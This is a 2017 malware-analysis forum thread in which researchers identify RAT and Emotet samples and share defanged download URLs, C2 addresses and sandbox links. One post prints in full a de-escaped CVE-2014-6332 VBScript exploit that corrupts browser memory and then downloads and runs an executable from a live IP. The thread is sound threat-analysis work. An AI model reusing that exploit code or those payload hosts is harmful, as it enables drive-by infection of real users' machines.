Malware collection

Forum for analysis and discussion about malware.
Cody Johnston
Posts: 157
Joined: Sun May 01, 2011 4:33 pm
Location: Los Angeles, CA
Contact:

Re: Malware collection

Post by Cody Johnston » Sat Jul 22, 2017 7:46 am

That is called 'RevengeRAT'

Code: Select all

this.ID = "SGFja2VkIEJ5IEhhbGxhag==";
ID string says 'Hacked By Hallaj'

It gets the payload from pastebin: hxxps://pastebin.com/raw/UCXsTaZ8 then loads it using csc

contacts: hxxp://89.148.30.116 on port 948 for C2

2nd stage 'unpacked' here: https://www.virustotal.com/en/file/2bf7 ... 500708743/

ikolor
Posts: 276
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sun Jul 23, 2017 2:32 pm

You do not have the required permissions to view the files attached to this post.

User avatar
xors
Posts: 138
Joined: Mon May 23, 2016 2:01 am

Re: Malware collection

Post by xors » Sun Jul 23, 2017 10:17 pm


CVE-2017-0199. Downloads from:
hxxp://dev.null.vg/sCjByat5.hta
@xorsthings

Antelox
Posts: 153
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Mon Jul 24, 2017 7:26 am

xors wrote:

CVE-2017-0199. Downloads from:
hxxp://dev.null.vg/sCjByat5.hta
Yes, which in turn downloads LuminosityLink RAT from:

Code: Select all

hxxp://subaat.com/files/714.exe
https://www.virustotal.com/en/file/3414 ... 2/analysis

BR,

Antelox

ikolor
Posts: 276
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Mon Jul 24, 2017 7:43 pm

You do not have the required permissions to view the files attached to this post.

Antelox
Posts: 153
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Tue Jul 25, 2017 7:51 am

The file is an HTML page exploited by CVE-2014-6332. It contains an escaped javascript code with download&run capabilities. The unescaped javascript code is the following one:

Code: Select all

<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">

function runmumaa() 
On Error Resume Next
Set objWsh = CreateObject("Wscript.Shell")

objWsh.run "cmd.exe /c echo >>C:\Windows\Temp\text.vbs Set xPost=createObject(""Microsoft.XMLHTTP"") & echo >>C:\Windows\Temp\text.vbs xPost.Open ""GET"",""http://107.182.21.243/tt.exe"",0 & echo >>C:\Windows\Temp\text.vbs xPost.Send() & echo >>C:\Windows\Temp\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>C:\Windows\Temp\text.vbs sGet.Mode=3 & echo >>C:\Windows\Temp\text.vbs sGet.Type=1 & echo >>C:\Windows\Temp\text.vbs sGet.Open() & echo >>C:\Windows\Temp\text.vbs sGet.Write xPost.ResponseBody & echo >>C:\Windows\Temp\text.vbs sGet.SaveToFile ""C:\Windows\Temp\putty.exe"",2",0
objWsh.run "cscript.exe C:\Windows\Temp\text.vbs",0,true
wscript.sleep 10000
objWsh.run "C:\Windows\Temp\putty.exe"
document.write(Err.Description)
end function

</script>

<SCRIPT LANGUAGE="VBScript">
 
dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent

  if(instr(info,"Win64")>0)   then
     exit   function
  end if

  if (instr(info,"MSIE")>0)   then 
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
  else
     exit   function  
             
  end if

  win9x=0

  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()                    
     else  
          setnotsafemode()
     end if
  end if
end function

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
    '   document.write(i)     
       Create=True
       Exit For
    End If 
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)  
  
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314

     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310  
     mydata=aa(a1)
     redim  Preserve aa(a0)  
end function 


function setnotsafemode()
    On Error Resume Next
    i=mydata()  
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)  
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
              j=0          
              redim  Preserve aa(a2)             
     aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0)  

     j=0 
              j=readmemo(i+&h120+k)   
         
               Exit for
           end if

    next 
    ab(2)=1.69759663316747E-313
    runmumaa() 
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
  
    redim  Preserve aa(a0) 
    redim   ab(a0)     
  
    redim  Preserve aa(a2)
  
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
          
    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16             
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then    
                 If(IsObject(aa(a1)) = False ) Then             
                   type1=VarType(aa(a1))
                 end if               
              end if
           else
             redim  Preserve aa(a0)
             exit  function

           end if 
        else
           if(vartype(aa(a1-1))<>0)  Then    
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if               
            end if
        end if
    end if
              
    
    If(type1=&h2f66) Then         
          Over=True      
    End If  
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If  

    redim  Preserve aa(a0)          
        
end function

function ReadMemo(add) 
    On Error Resume Next
    redim  Preserve aa(a2)  
  
    ab(0)=0   
    aa(a1)=add+4     
    ab(0)=1.69759663316747E-313       
    ReadMemo=lenb(aa(a1))  
   
    ab(0)=0    
 
    redim  Preserve aa(a0)
end function

</script>

</body>
</html>
It tries to download a payload from:

Code: Select all

hxxp://107.182.21.243/tt.exe
https://www.virustotal.com/en/file/af72 ... /analysis/
https://www.hybrid-analysis.com/sample/ ... mentId=100

The payload seems to belong to Gh0st RAT AKA Miancha malware family.

C2:

Code: Select all

ianxt.f3322.net
BR,

Antelox

ikolor
Posts: 276
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Wed Jul 26, 2017 8:29 am

You do not have the required permissions to view the files attached to this post.

Antelox
Posts: 153
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Wed Jul 26, 2017 9:27 am

Geodo/Emotet doc downloader

https://www.hybrid-analysis.com/sample/ ... mentId=100

The Geodo binary:

https://www.virustotal.com/en/file/a79d ... /analysis/
https://www.hybrid-analysis.com/sample/ ... mentId=100

FYI in the HA report, you can find some download URLs, both for the doc and the binary.

BR,

Antelox

ikolor
Posts: 276
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Wed Jul 26, 2017 7:04 pm

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 276
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Thu Jul 27, 2017 6:50 am

Excuse me what this is this file .Malware or not.I see it is coding this file """"cve5p3sM.rar""""

https://www.virustotal.com/en/file/8fd0 ... 501137934/
You do not have the required permissions to view the files attached to this post.

Post Reply